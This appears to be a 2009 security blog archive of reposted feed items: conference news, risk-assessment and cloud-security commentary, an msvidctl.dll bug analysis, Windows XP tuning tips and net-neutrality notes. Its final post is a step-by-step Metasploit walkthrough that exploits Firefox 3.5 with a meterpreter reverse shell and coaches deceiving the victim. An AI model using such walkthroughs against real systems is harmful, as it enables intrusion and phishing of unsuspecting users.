Archive for July, 2009
MAX pwned ToolsWatch :)
July 31st, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Here is a special posting … MAX on ToolsWatch
0wn3d by MAX
Las Vegas 2009
July 30th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
There are so many things going on in vegas this year its hard to keep track of them all.
1.) HD Moore and I are teaching a class on Tactical Exploitation at Blackhat July 27-28th
2.) The first day of Blackhat Briefings, July 29th we have organized an entire Metasploit Track.
Many Metasploit, Attack Research, carnal0wnage and others people will be speaking in this special track, including:
Dino Dai Zovi, Mike Kershaw, Chris Gates, Peter Silberman, Egypt, I)ruid, Valsmith, Colin Ames, and Dave Kerb,
3.) On Thursday July 30th, HD Moore, Valsmith and others will be speaking at an undisclosed location for BsidesLasVegas
4.) Friday night Attack Research has rented the top of the Riviera for a small party. Find someone from AR to get a specially minted party invite challenge coin
5.) Saturday at Defcon we have another special metasploit track that runs all day, same speakers as Blackhat but including HD Moore and others.
6.) Saturday at noon Valsmith will also be giving a skytalk
There us much much more great stuff going on so hope to see you there!
V.
BlackHat slides available and first blogposts
July 29th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Blackhat was really fast to upload some of their content. You can already get it at http://www.blackhat.com/html/bh-usa-09/bh-usa-09-archives.html.
I have already glanced at lockpick forensics, sniffing keyboards with lasers and Breaking the security myths of Extended Validation SSL Certificates. Some really interesting stuff in there!!
Here are some blogposts fresh of the shelf as well:
- BlackHat 2009 Whitepaper: Attacking Interoperability
- Our Favorite XSS Filters and How to Attack Them
- Deactivate the Rootkit
- Live Blog: BlackHat 2009 Day 1
- HP researchers reveal details of browser based darknet
- SSL under attack (again) #BlackHat
Speeding up MD5 collision hashing on GPUs, breaking EV SSL, or just breaking SSL all together, I see a trend that says that public PKI is completely broken. Oh, wasn’t there a study today that said users ignore SSL warnings anyway?
Keep tuned, I’m seeing tweets that Dan Kaminsky is having a go at X.509 as well. #ssl #epicfail??
Related posts:
- How to follow Blackhat/Defcon without being there
- Preparing your laptop (or iPhone) for a security/hacker conference
(Photo under creative commons from Ben+Sam’s photostream)
Yahoo! Surrenders
July 29th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
The deal with Microsoft is a strategy of last resort for the struggling Internet giant.
The Curious Case of Asset Valuation
July 22nd, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
I recently had a discussion with someone about how to do asset valuation for risk assessments. It was a good discussion that prompted me to share with you. The whole concept of asset valuation (as it exists for information security) is predicated on the assumption that acquisition cost is a good constituent factor of security risk. So, how do we evaluate the asset valuation landscape?
Let’s start with our international standard for risk assessments: ISO 27005. There is a relatively lengthy discussion of asset valuation in Appendix B.2 (read here for Alex’s 27005 review). This is encouraging, however the discussion very quickly devolves from “what does it cost to replace this” to what they term “consequences.” Consequences are what happen as a result of having the asset. What does this mean? Well, they offer a list of things that may help (they make a point to let you know this might not be a complete list):
- Interruption of service
- Inability to provide the service
- Loss of customer confidence
- Loss of credibility in the internal information system
- Damage to reputation
- Disruption of internal operation
- Disruption in the organization itself
- Additional internal cost
- Disruption of a third party’s operation
- Disruption in third parties transacting with the organization
- Inability to fulfill legal obligations
- Inability to fulfill contractual obligations
- Danger for the organization’s personnel and / or users
- Attack on users’ private life
…and this isn’t the complete list.
What strikes me as a FAIR practitioner, is that this list is void of any taxonomy. In other words, there’s no categories, just a list of specific types of incidents (that surely isn’t comprehensive). I jotted down a quick mapping to FAIR loss categories and noticed that most map to secondary loss categories, strengthening the Chicken Little security practitioner’s view of the world.
So FAIR practitioner’s are at an advantage when speaking about asset valuation, because we don’t get caught up in the existential discussion about an asset’s “consequences,” and likewise we don’t narrow our focus to just replacement cost. We have our capacious list of loss categories, and we rely on the scenario to help guide our Probable Loss Magnitude discussions. Because asset valuation (per my strict vantage point of replacement only) is myopic, the bigger, more important discussion is what the losses look like. Certainly, these are consequences, but the perspective is different. Instead of listing every possible loss for a given asset, we only estimate the losses for an asset in a given scenario. There may be many scenarios, but funneling our thoughts to the specific saves us from wondering what effect nuclear fallout will have on our database servers.
The six loss categories are great fodder for really interesting discussions that bring the security and risk practitioner closer to the business and this is key: you can get asset valuation from the balance sheet; true business risk often sits in the heads of technical, managerial, and executives in the business. What this means is that risk (and infosec really) needs to be the (or at least a) bridge between IT and the business.
Eclipse of the Century Live Online Tonight
July 21st, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Watch tonight’s eclipse online, unless you’re in Asia. There won’t be an eclipse this long again until 2132.
Poking around MSVIDCTL.DLL
July 21st, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Hey all,
I have to admit that I did not follow the msvidctl.dll situation all that closely, except for my short tweet that this bug was apparently reported more than a year ago. Yesterday, my old friend Dennis Elser piqued my interest: He had isolated the bug down to a function called ATL::CComVariant::ReadFromStream. He had determined that the function in question made a rather strange mistake: Instead of passing a pointer to a data buffer to IStream::Read, it took the address of a (small) local variable, and passes this address as output buffer to IStream::Read, along with a length read from the stream previously.
Somebody clearly got confused.
So Dennis and me sat down tonight and did a bit of digging around and tried to clarify what was going on. So we dug in a bit deeper, and ended up with the following understanding of the situation:
- If the stuff that is supposed to be deserialized does not contain the proper value in the first 2 bytes, 8 more bytes are read, and SafeArrayCreate is used to create a new array with a 4-byte size obtained from these bytes.
- A pointer to the allocated memory is obtained by ways of calling SafeArrayAccessData. This function places a pointer to the memory in question into a memory cell pointed to by it’s second argument.
- Instead of passing the CONTENTS of the memory cell pointed to by the second argument to IStream::Read, the code in question passes the address of this variable in. This happens to be the re-used memory for the first argument of ReadFromStream, hence it is on the stack. Memory corruption hilarity ensues.
This is a cute little bug. First of all, it is a beautiful example of a single excess "&" in the source code. But what is most amusing about this bug is the centrality of it — it is, after all, in a method of a class from the ATL.
Everybody loves bugs in libraries. Few things fill my heart with quite as much amusement as bugs in heavily-used, statically-linked libraries. OpenSSL (and libeay) was good for many laughs in the past, zlib was a favourite for a long time, too.
So what we have here is a bug in a component that is used fairly widely, and that has the property of being statically linked (yay templates !).
Now, a quick search of my harddisk turned out that a lot of third-party components (flash) contain the same function — but in old and non-vulnerable versions (for an extra dash of irony, the function used to be safe before all this SafeArray-stuff was added). Only a small fraction of the files that use the ATL and contain this function appear to contain it in a vulnerable version.
We ended up building a really naive / stupid / false-negative-and-false-positive-prone regexp to scan for the vulnerable basic block. This is of course going to fail if anyone has tweaked their optimization settings etc., but it would still be interesting to find out how many files contain this “trivial” byte string.
So I searched my windows directory for the following regexp pattern:
pattern = “\x8B\x07\x6A\x00\xFF\x75\x2E\x8D\x4D\x2E\x51\x57\xFF\x50\x0C\x53″
r = re.compile( pattern, re.DOTALL )
There were a few files in which this pattern was found (XP):
Found pattern in file c:\Windows\system32\ieframe.dll
Found pattern in file c:\Windows\system32\mstscax.dll
Found pattern in file c:\Windows\system32\msvidctl.dll
Found pattern in file c:\Windows\system32\wmp.dll
Found pattern in file c:\Windows\system32\wmpdxm.dll
Dennis searched for the same pattern on his disk (Vista) and found:
c:\windows\system32\cic.dll
c:\windows\system32\comsnap.dll
c:\windows\system32\comsvcs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\mmcndmgr.dll
c:\windows\system32\mstscax.dll
c:\windows\system32\MSVidCtl.dll
c:\windows\system32\puiobj.dll
c:\windows\system32\rdpencom.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\wiaaut.dll
c:\windows\system32\wmp.dll
c:\windows\system32\wmpdxm.dll
Why the difference ? Well, amusingly, shdocvw.dll on my XP machine doesn’t have this SafeArray-stuff in it yet — it is probably compiled using an older, not vulnerable variant of the ATL — wheras Dennis variant of the same DLL is much newer, compiled with the ‘broken’ variant of the ATL.
So, where does this leave us ?
- The bug is actually much “deeper” than most people realize.
- The killbit-fix is clearly insufficient, as there are bound to be many other ways of triggering the issue.
- The bug might have weaseled it’s way into third-party components, IF anyone outside of Microsoft had access to the broken ATL versions.
- If this has happened, MS might have accidentally introduced security vulnerabilities into third-party products.
- Depending on the optimization settings applied to the executables, it might require a bit of an effort to find out whether a vulnerable or non-vulnerable version of the code is present.
- There might be a lot of recompiling next week.
- IF this has gotten into third-party-products, I would bet that only a tiny fraction of software vendors will push out proper/timely updates.
It just seems that spending time to improve BinDiffs ability to find statically linked libraries might have been worth it 
Anyhow, I really need to get to sleep — I have a train to catch in a bit more than 4 hours.
A lot of credit for this post has to go to Dennis Elser — he did most of the hard work before we sat down.
‘Sexy View/Sexy Space’ Symbian Worm Spreading
July 17th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Worm’s application payload comes Symbian-signed, researchers disagree over whether or not it’s building a full-blown mobile phone botnet
Oracle Secure Backup Command Injection to Metasploit PHP Shell
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Background and motivation here:
http://joxeankoret.com/blog/?p=39
Before I forget thanks to egypt, pragmatk, and of course MC…
MSF trunk has had an exploit for awhile that exploits the above
http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/ad…
given the example in Joxean’s advisory with the PHP shell I hit up the metasploit php ninja (egypt) on how to leverage it.
Metasploit has a php reverse and bind shell, you can use the multihandler to catch callbacks or connect to the bind shell. To get the shell on the box we can output the payload as raw or base64
SpyDLLRemover v2.5 Unleashed!
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Hey guys,
We have released the next version of SpyDLLRemover [v2.5], which includes major updates and minor bug fixes. We have added a DLL Tracer tab, which would let you [the user] to search for processes running a specific DLL on your system. In that way, if you know the name of your injected DLL, it would list all the process names that run this DLL.
Check it out @: http://www.rootkitanalytics.com/tools/spy-dll-remover.php
From here on, we are shifting from 3-number versioning system to a 2-number system and we are reserving the 3rd number for internal us [to track minor updates].
If you have any questions or comments, do not hesitate to contact us [at contact.fingers @ gmail.com] either way.
EF
Make Windows XP Blazingly Fast
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
I’ve been using Windows since before “Windows for Workgroups 3.x” and have used most of the Windows releases since, on a wide variety of cheaper than cheap computers and platforms that are slower than slow. I’m always interested in new ways to maximize speed and over the years I’ve picked up quite a few little tips on how to max out your Windows PC. I am not fond of being forced to use MS, and am not a MS expert, so I hope all you Windows peeps will share your tips with us.. And some of these tips can crash your machine if you don’t know what you are doing.
Overview and General Ideas
Basic Definitions
- CPU – Central Processing Unit
- This is what Intel and AMD commercials are about, this chip functions like a calculator, computing all the data.
- Hard Drive
- This is a glorified CD-ROM Disc that is much faster and has a higher capacity than a CD-ROM. This is where all your files and Operating System is stored on.
- RAM – Random Access Memory
- Data that is frequently accessed is stored in RAM instead of the Hard Drive because RAM is much much faster.
- Page File / Virtual Memory
- This is literally a file that is stored on your Hard Drive and is used as a form of RAM when you run out of real RAM. Much slower than RAM (because it is located on the hard drive) it is used to store bits of data used by programs.
Three-pronged attack against the sluggish druggish
-
Increase RAM/Memory
Reducing the amount of RAM that is wasted by unneeded programs, unused device drivers and devices, background services, visual effects, and various other stuff frees up RAM for your needed programs and processes. The final step of this article details the Cacheman Software that automatically takes care of everything this article doesn’t go into (like registry modifications and hidden tweaks)..
-
Optimize Hard Drive Data
The attack in order:
- Reduce Amount of data on drive by removing unneeded data and configuring optimum settings to prevent buildup in the future.
- Configure settings which minimize the amount of disk activity, e.g., reading and writing to disk.
- Defragment the data that is left, and setup an automated system to prevent fragmentation in the future.
-
Free Up CPU Time
Almost all of the following tips will help to decrease the amount of CPU processing time that is wasted on unneeded processes.
Part 1: Increase and Free Memory/RAM
Configure Performance Options
Control Panel -> System -> Advanced -> Performance -> Settings
If you have massive RAM like I do, best appearance is nice. To max your speed change to “Adjust for best performance”.
Change Theme to Classic
The Classic Theme uses less RAM and CPU than the newer XP themes.
Fine-Tune Effects
Disable all for maximum speed. I like to only leave ClearType enabled.
Color quality and Resolution
To sacrifice quality for speed, change the Color quality to a lower setting, and lower the resolution if you want.
Clean up that Desktop!
Your desktop is always loaded in RAM, as it is always available to view. So everything that is ON your desktop is likewise stored in RAM. This means that every icon located on your desktop, which is actually an icon file, is loaded in RAM. What I do is instead of a cluttered Desktop always loaded in RAM, I simply create 1 folder called Desktop on my Desktop, and move everything from my desktop to that folder. That way instead of all those icons taking up memory, now only the single folder icon is taking up RAM. Not a HUGE impact, but it illustrates what RAM is and how you can stop wasting it.
Make Background Solid Color
By setting the background image of your desktop (and folders if you are using custom folder backgrounds) to none, and instead just using a solid color (like blue) you free up RAM. If your desktop uses a high-quality background image (like mine) that is a 5MB jpeg image, that effectively wastes 5MB of your RAM. A solid color background uses none.
Optimize Folder Options
Open up Explorer/My Computer -> Tools -> Folder Options
First change the option to “Use Windows classic folders“. Now goto the View tab and hit the button “Reset all Folders“, which will clear your individual folder viewing settings. Then change the options to the ones I have selected in the image for optimum speed, its up to you which options you don’t want to change. The searching for network folders is a very real cause of slowness.
Page File / Virtual Memory
The optimal way to use a page file is to not use a pagefile and max out your physical RAM. Next to doing that (which Windows won’t let you do anyway, they love pagefiling) the optimal setup is to have the pagefile on a 2nd hard-drive-disk. The computer can only read/write data to/from the hard drive at a certain speed, and only a certain amount of read/writes can be going on at one time.. Think of it like a pipe. Having the pagefile.sys on the same disk that Windows and all the Program’s are loaded on clogs the pipe and limits flow of data in both directions.
Note that moving the page file to a separate partition on the same hard drive would NOT fix this problem or alleviate the bottleneck in any way, so the solution is to get a 2nd hard drive, I personally recommend these 2 $49.99 – 320GB x 7500RPM hard-drives that are very reliable.
Page File Size
The size of your pagefile is up for debate, no clear answer, but I’ve tried a lot of different configurations over the years and here is what I recommend. If you have little RAM (less than 1GB), then you should just let Windows control it. Otherwise use the custom option to set it at a low initial size of 400MB to grow up to 3096MB. I have 4GB of RAM, so I set it to start at 100MB and grow to 5000MB. The general rule is to set it to be 1.5x the amount of RAM you have.
Disable Devices
Disable any devices you never use, like internal modems, firewire ports, floppy drives, etc.. Also disable them in your systems BIOS if you can.
Uninstalling Devices
If you have devices that you used on your computer in the past but don’t anymore, they are still being loaded up by Windows and at the very least hogging some resources. So go through and uninstall them.. (You have to select View -> Show hidden devices).. If you plug them back in they will be re-installed with the “Found new hardware” wizard.
Disable Fast User Switching
Control Panel -> Users -> Change the way users log on
Make sure you disable fast-user-switching unless you absolutely must have it. I’ve found it to be a cool feature if you are a basic computer user not installing programs or tweaking settings.. Nut it can create big problems if you use your computer for all sorts of *advanced* stuff (advanced for Windows)… Plus disabling it will have some speed improvements.
Optimizing Services
Start -> Run -> services.msc
First make sure you export your current services to a backup file before you begin. There are a number of informative articles about this topic on the web.
Removing Unneeded Network Protocols
This actually helps a lot and can have a significant impact on your computer speed, much more so than any impact on network speed improvements. These protocols require all sorts of RAM and are kept loaded. They also represent a security risk as it provides another process to be attacked.
Part 2: Optimize Hard Drive and Data
Recommended Hard Drives
These are the cheapest price’s for these tried and true hard-drives. I love TigerDirect and recommend you check them out.
- $49.99 Seagate Barracuda 320GB – 7200RPM
- $49.99 WD3200 Caviar Blue 320GB – 7200RPM
- $59.99 WD5000 Caviar Blue 500GB – 7200RPM
- $229.99 WD VelociRaptor 320GB – 10,000RPM, FAST!
File System Tweaks
Start -> Run -> compmgmt.msc
Check the structure and properties of your disks and partitions to see if anything is out of place. Make sure file systems are using NTFS. But some partitions like dell utility partition, or a partition shared by linux/mac/windows on dual-boot systems may be fat or fat32. To convert fat-based to NTFS, defragment MFT, resize NTFS clusters, etc.. you have to use a third part product. I personally use Norton Partition Magic, Paragon Partition Manager, and Acronis Disk Director Suite (plus 20 other various tools).
2nd Hard Drive
*Advanced*
If your lucky or smart enough to have more than one hard drive disk installed, in addition to moving your pagefile to that 2nd hard-drive you should setup the hard drive with at least 2 partitions first. Say you install one of those 320GB hard drives I recommend… Here’s how I set the partitions on the 2nd hard-drive.
- 6.5GB – S: [SWAP] – First partition is fastest area on drive, this partition is ONLY for the pagefile. Size is 1.5x the max size of your pagefile setting, or 1.5x the amount of RAM.
- 13.5GB – 2nd partition is not given a drive letter, instead it is mounted as both C:\TMP and C:\TEMP folders.. similarly to optimizing the pagefile, Windows and Programs use the TMP and TEMP folders A LOT so this will really speed up any installations and a lot of Windows itself. *very tricky*
- 300GB – This is also mounted instead of given a drive letter, mounted as “C:\Documents and Settings” which is where all your settings and user files (Desktop, My Documents) are stored. *very tricky*
Setting up the TMP and “Documents and Settings” folders that way is NOT for beginners, its advanced and dangerous if you do it wrong. But definately has one of the biggest noticeable speed benefits.
Remove Unneccessary Programs
Control Panel -> Add or Remove Programs
Remove all programs that you are positive you don’t need anymore, the more you remove, the better. Microsoft provides a free tool that is simple and helpful when removing programs. Download it at: Windows Installer CleanUp Utility
Remove Windows Components
The only main categories I need are Internet Explorer, Windows Media Player, Update Root Certificates, and Accessories and Utilities
I also remove the Games category which is a subcategory of Accessories and Utilities.
System Restore Optimization
Turn off system restore on any drives that are not crucial… So if you have a 2nd hard-drive that is used for pagefile and temp file storage, turn it off. And you should make sure the settings aren’t too generous, I usually never go higher than 10GB.
Recycle Bin Settings
Keep this setting to a low value, try not to delete stuff you will need later. I personally disable the Recycle Bin completely.. but I come from a unix background so I have no issues with misplacing files.
Remove Unneccessary Fonts
C:\Windows\Fonts
Fonts are loaded up by default by Windows and every time you load a program like Photoshop, Microsoft Word, Outlook, etc., so moving any you never use out of the C:\Windows\Fonts folder saves RAM and CPU and HD space. This is a bit hairy but I sort by size and then check out how long its been since the font has been accessed by looking at the file attributes. The less fonts you have, the faster your computer, but there is obviously a trade-off. You can move all fonts except for a few basic ones included with Windows to a backup folder instead of deleting them, then reboot and if your font is messed up then move some of the fonts from the backup folder back and try again.
Prefetch Cleaning
Delete the contents of the C:\WINDOWS\Prefetch folder and restart the computer. Its good to empty this folder and reboot after major upgrades or about once a month.
Part 3: Finishing the Optimization Process
These 3 tips will have the biggest speed impact for 99% of you, this is some really good stuff.
Disk Cleanup
Start -> Run -> %SystemRoot%\system32\cleanmgr.exe
This wizard is a very useful tool that combines several cleanup tools in one location. It also provides a way to clean up all past restore points save on your disk except the most recent one.
Defragmenting with SmartDefrag
The World’s Most Efficient Defragmenter
What’s the primary cause of slow/unstable PC performance? It’s disk fragmentation. Smart Defrag helps defragment your hard drives more efficiently than any other product on the market –– free or not.
This powerful, award-winning free defragmenter is 100% safe and clean with no adware, spyware, or viruses.
Cacheman XP Optimization
Cacheman is a Windows software designed to speed up your computer by optimizing several caches, managing RAM and fine tuning a number of system settings. Auto-Optimization makes it suitable for novice and intermediate users yet it is also powerful and versatile enough for computer experts. Backups of settings ensure that all user modifications can be reversed with a single click.
Software Recommendations
From the Sysinternals Suite
Autoruns
See what programs are configured to startup automatically when your system boots and you login. Autoruns also shows you the full list of Registry and file locations where applications can configure auto-start settings.
Process Explorer
Find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. This uniquely powerful utility will even show you who owns each process.
Process Monitor
Monitor file system, Registry, process, thread and DLL activity in real-time.
VMMap
See a breakdown of a process’s committed virtual memory types as well as the amount of physical memory (working set) assigned by the operating system to those types. Identify the sources of process memory usage and the memory cost of application features.
Tweak UI Powertoy
This PowerToy gives you access to system settings that are not exposed in the Windows XP default user interface, including mouse settings, Explorer settings, taskbar settings, and more.
Social Engineering Contest – Defcon 2009
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Social Engineer your way to a free course!
DC718 and Telephreak are bringing Social Engineering back to Defcon.
Offensive Security has linked together with DC718, Telephreak, the contest/event Goons Pyr0 and Russr and www.social-engineer.org to have the best of the best to judge and help mold this contest into the display of the serious threat that still [...]
In Case You Missed It: Reflecting on the CRTC’s Net Neutrality Hearing
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
In case you missed or avoided the CRTC net neutrality hearing, I thought I would post a few reflections (my summaries of the events are available at Day 1, 2, 3, 4, 5, 6, and 7; additional coverage NetNeutrality.ca). While there were some notable anecdotes and quotes (Rogers comment about traffic managing a cure for cancer come to mind), I would point to six key revelations that evolved over the course of the week and a half.
1. The rate of network traffic growth is slowing. This was raised midway through the first week by Professor Odlyzko and was subsequently confirmed by several ISPs. The revelations ran counter to the general sense before the hearings that ISPs cannot keep pace with the rate of growth. In fact, it turns out the opposite is true – reasonable new investment in the networks can address current growth rates.
2. There is a wide variation in the use of traffic management tools with a different approach for pretty much every major ISP. There are those that throttle all the time (Cogeco), during large chunks of the day (Bell), only during congested periods (Shaw), or not at all (Telus, Videotron). There are those that throttle upload only (Rogers) or upload and download (Bell). There are those that use "economic measures" such as bit caps effectively (Videotron) and others that doubt it can be an effective approach on its own (Bell). This points to the fact that granular rules will be difficult, but broader principled tests are essential.
3. The rules for retail and wholesale will be different. The hearing surprisingly included a near-rehearing of the Bell v. CAIP case. Wholesale services were much discussed as the CRTC recognized the potential of independent ISPs to inject additional competition into the marketplace. Based on the evidence, it would appear that the problems with wholesale are largely a Bell problem. Many other ISPs that offer wholesale services do not traffic manage or have such small wholesale businesses that the impact is fairly small. Bell is a big player in the wholesale side and they have designed their network in a manner that makes it difficult to fully exploit the competitive potential of smaller entrants. While CAIP argued for rules against wholesale throttling but against retail restrictions (thereby abandoning consumer interests), the opposite seems more likely to occur.
4. Disclosures are woefully inadequate in Canada. Each day brought new and surprising revelations about how little ISPs tell their customers about their traffic management practices. By far the most egregious was Rogers, which admitted that it charges tiered pricing for faster upload speeds but that all tiers were throttled to the same speed when using P2P. In other words, the Extreme subscriber who pays $59.99 per month and is promised fast upload speeds (1 Mbps) actually gets the same upload speed as the Express subscriber who pays $46.99 per month and is promised upload speeds of 512 kbps. There were similar stories from many other ISPs, who disclosed actual speeds that bring P2P down to a virtual crawl. Disclosure has improved over the past year as the issue has gained prominence, but there clearly is a long way to go.
5. Managed networks vs. public Internet. ISPs do not focus on the fact that many run managed IP networks offering telephony and IPTV on the same pipe as the public Internet services. When asked whether the two impact each other, the answer came back that it could. In fact, ISPs were at pains to say that while it could happen, it would not happen since they ensure that they provision enough bandwidth for their managed services. Yet in examples such as Bell's three users promised 5 megs but with only 10 megs to share, it was apparent that the same cannot be said for oversold public Internet services.
6. The Commission takes privacy seriously. The ISPs seemed surprised that the Commission regularly asked about the privacy impact of throttling and deep-packet inspection. The Commission was similarly surprised when Bell admitted that Canadian privacy law would permit the use of DPI data for marketing purposes with the customer's consent.
Where to from here?
The parties will have a couple of weeks to file final submissions and a decision will likely take several months. My best guess is that the Commission will likely leave the wholesale side alone, though a best case might be to place restrictions on traffic management where the provider has the capability of differentiating between wholesale customers. Bell says that they cannot do so today, but the introduction of usage based billing might change that equation.
On the retail side, I think a four-pronged approach is possible. First, the Commission could adopt the Open Internet Coalition/CIPPIC style test based on Oakes that permits traffic management practices so long as they further a pressing and substantial objective, are narrowly tailored to the objective, and are the least restrictive means of achieving the objective. This test would give useful guidance to ISPs and ensure that there are appropriate limits on traffic management practices that have no clear correlation with network congestion. Second, the Commission can affirm the role of current law against undue preferences and work to stop any attempt to leverage network management for unfair advantage. Third, it can establish minimum disclosure requirements including information on traffic management practices such as time, targets, and speeds when shaping. Fourth, the Commission can establish a prohibition against the use of DPI data for any purpose other than network management.
Of course, the Commission could decide to do nothing and simply retain the power to address complaints as they arise. If that approach is adopted, I think there would be significant political pushback, with political parties seeking net neutrality legislative reform.
Cloud Security: Waiting For Godot & His Silver Bullet
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
It’s that time again. I am compelled after witnessing certain behaviors to play anthropologist and softly whisper my observations in your ear.
You may be familiar with Beckett’s “Waiting For Godot”*:
Waiting for Godot follows two days in the lives of a pair of men who divert themselves while they wait expectantly and unsuccessfully for someone named Godot to arrive. They claim him as an acquaintance but in fact hardly know him, admitting that they would not recognise him were they to see him. To occupy themselves, they eat, sleep, converse, argue, sing, play games, exercise, swap hats, and contemplate suicide — anything “to hold the terrible silence at bay”
Referencing my prior post about the state of Cloud security, I’m reminded of the fact that as a community of providers and consumers, we continue to wait for the security equivalent of Godot to arrive and solve all of our attendant Cloud security challenges with the offer of some mythical silver bullet. We wait and wait for our security Godot as I mix metaphors and butcher Beckett’s opus to pass the time.
Here’s a classic illustration of hoping our way to Cloud security from a ComputerWeekly post titled “Cryptography breakthrough paves way to secure cloud services:”
A research student who had a summer job at IBM, has cracked a cryptography problem that has baffled experts for over 30 years. The breakthrough may pave the way to secure cloud computing services.
This sounds fantastic and much has been written about this “homomorphic encryption,” with many people espousing how encryption will “solve our Cloud security problems.”
It’s a very interesting concept, but as to paving the “…path to secure cloud computing,” the reality is that it won’t. At least not in isolation and not without some serious scale in ancillary support mechanisms including non-trivial issues like federated identity.
Bruce Schneier wades in with his assessment:
Unfortunately — you knew that was coming, right? — Gentry’s scheme is completely impractical…Despite this, IBM’s PR machine has been in overdrive about the discovery. Its press release makes it sound like this new homomorphic scheme is going to rewrite the business of computing: not just cloud computing, but “enabling filters to identify spam, even in encrypted email, or protection information contained in electronic medical records.” Maybe someday, but not in my lifetime.
The reality is that in addition to utilizing encryption — both existing and new approaches — we still continue to need all the usual suspects as they deal with the fact that fundamentally we’re still in a cycle of constructing insecure code in infostructure sitting atop infrastructure and metastructure that has its own fair share of growing up to do.
As a security architect, engineer, or manager, you need to continue to invest in understanding how what you have does or does not work within the context of Cloud.
You will likely find that you will need to continue to invest in threat and trust models analysis, risk management, vulnerability assessment, (id)entity management, compensating controls implemented as hardware and software technology solutions such as firewalls, IDP, DLP, and policy instantiation, etc. as well as host of modified and new approaches to dealing with Cloud-specific implementation challenges, especially those based on virtualization and massive scale with multitenancy.
These problems don’t solve themselves and we are simply not changing our behavior. We wait and wait for our Godot.
So here’s the obligatory grumpy statement of the obvious as providers of solutions and services churn to deliver more capable solutions to put in your hands:
There is no silver bullet, just a lot of silver buckshot. Use it all. You’re going to have to deal with the cards we are dealt for the foreseeable future whilst we retool our approach in the longer term and technology equalizes some of our shortfalls.
Godot is not coming and you likely wouldn’t recognize him if he showed up anyway because he’d be dressed in homomorphic invisible hotpants…
Get on with it. Treat security as the enterprise architecture element it is and use Cloud as the excuse to make things better by working on the things that matter.
If Godot does happen to show up, tell him I want my weed whacker back that he borrowed last summer.
/Hoff
* Wikipedia
Related posts:
Firefox 3.5 escape() Return Value Memory Corruption Metasploit Exploit
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Metasploit has released an exploit for Mozilla Firefox version 3.5 Tracemonkey components of Firefox’s javascript rendering engine. The bug is covered in in Mozilla’s Bugzilla as bug 503286. The first public exploit seen was in Milw0rm by the author SBerry aka Simon Berry-Byrne, he gives thanks to HD for his help in writing the exploit code which was later converted by HD in to a Metasploit module. The main exploit code is a javascript generated with the selected payload and then encoded to make it more difficult to be detected by HIPS, IPS and IDS systems. A way to use this module would be running msfconsole as root so as to be able to use low ports for our listeners:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole[sudo] password for carlos:## ### ## #### ## #### ###### #### ##### ##### ## #### ############# ## ## ## ## ## ## ## ## ## ## ### ######### ###### ## ##### #### ## ## ## ## ## ## #### # ## ## ## ## ## ## ##### ## ## ## ## #### ## #### ### ##### ##### ## #### #### #### #####=[ msf v3.3-dev+ -- --=[ 384 exploits - 261 payloads+ -- --=[ 20 encoders - 7 nops=[ 166 auxmsf >
We then select the exploit and a Meterpreter reverse TCP shell:
msf > use exploit/multi/browser/firefox_escape_retvalmsf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcp
We take a look at the options available:
msf exploit(firefox_escape_retval) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host to listen on.SRVPORT 8080 yes The local port to listen on.SSL false no Use SSLURIPATH no The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique: seh, thread, processLHOST yes The local addressLPORT 4444 yes The local portExploit target:Id Name-- ----0 Firefox 3.5.0 on Windows XP SP0-SP3
A recommended way of attacking would be to set the port for the exploit to port 80 since this is the default port for HTTP which will be the protocol we will use to exploit the browser, we will set a friendly URI path:
msf exploit(firefox_escape_retval) > set SRVPORT 80SRVPORT => 80msf exploit(firefox_escape_retval) > set URIPATH secret.htmlURIPATH => secret.html
For the payload we will set the local host from where we are lunching the attack and to where we want the target to connect back to, we choose port 443 the default port for HTTPS since the chances of this port being open in most environments tend to be high:
msf exploit(firefox_escape_retval) > set LHOST 192.168.1.158LHOST => 192.168.1.158msf exploit(firefox_escape_retval) > set LPORT 443LPORT => 443
Now the exploit is ran and it will listen for the targets connection:
msf exploit(firefox_escape_retval) > exploit[*] Exploit running as background job.msf exploit(firefox_escape_retval) >[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:80/secret.html[*] Local IP: http://192.168.1.158:80/secret.html[*] Server started.
We craft our email or other type of message for the target to read and we inform him that he might get a popup stating that the script may have hanged and to just click continue since is normal. The message that will appear at the target will be something similar to this:
When the client click on the link the exploit will be deployed with the payload:
[*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.139:1046...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (718336 bytes)[*] Meterpreter session 1 opened (192.168.1.158:443 -> 192.168.1.139:1047)msf exploit(firefox_escape_retval) > sessions -i 1[*] Starting interaction with 1...meterpreter > sysinfoComputer: WINXPLAB01OS : Windows XP (Build 2600, Service Pack 2).
Since the browser window will hang and might be closed by the target it is important to migrate of that process as quickly as possible so we run the migrate script:
